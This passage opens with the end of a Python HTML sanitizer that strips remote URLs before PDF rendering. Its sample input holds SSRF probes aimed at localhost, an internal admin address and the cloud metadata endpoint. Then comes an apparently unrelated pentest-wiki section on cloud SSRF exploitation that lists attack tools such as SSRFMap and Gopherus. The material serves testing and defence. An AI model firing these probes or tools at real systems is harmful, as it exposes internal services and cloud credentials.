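    def handle_startendtag(self, tag, attrs):
        cleaned = self._clean(tag, attrs)
        if cleaned is not None:
            self.out.append(self._render(tag, cleaned, True))

    def handle_endtag(self, tag):
        if tag != "link":
            self._in_style = False
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._in_style and CSS_URL.search(data):
            self.removed.append(("style", data.strip()))
            data = CSS_URL.sub("", data)
        self.out.append(data)

    def handle_entityref(self, name): self.out.append(f"&{name};")
    def handle_charref(self, name): self.out.append(f"&#{name};")

def sanitize_for_pdf(source):
    """Return (clean_html, removed) ready to hand to the PDF renderer."""
    parser = PdfHtmlSanitizer()
    parser.feed(source)
    parser.close()
    return "".join(parser.out), parser.removed

# Constructed input mirroring the probe HTML shown above.
SAMPLE_HTML = (
    '<html><body><img width="1" height="1" src="http://127.0.0.1:8080/healthz">'
    '<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />'
    '<img src="data:image/png;base64,iVBORw0KGgo=">'
    '<p style="background:url(http://169.254.169.254/latest/)">report</p>'
    '</body></html>'
)
```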

Cloud SSRF Exploitation

If you find an SSRF vulnerability in a machine running inside a cloud environment, you might be able to obtain interesting information about the cloud environment and even credentials:

Cloud SSRF

SSRF Vulnerable Platforms

Several well-known platforms contain or have contained SSRF vulnerabilities; check them here:

SSRF Vulnerable Platforms

Tools

SSRFMap

Tool to detect and exploit SSRF vulnerabilities

Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for the most common Java RMI vulnerabilities. Most of the available operations support the --ssrf option, to generate an SSRF payload for the requested operation. Together with the --gopher option, ready-to-use gopher payloads can be generated directly.

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: this lab contains sample code that is vulnerable to Server-Side Request Forgery attacks
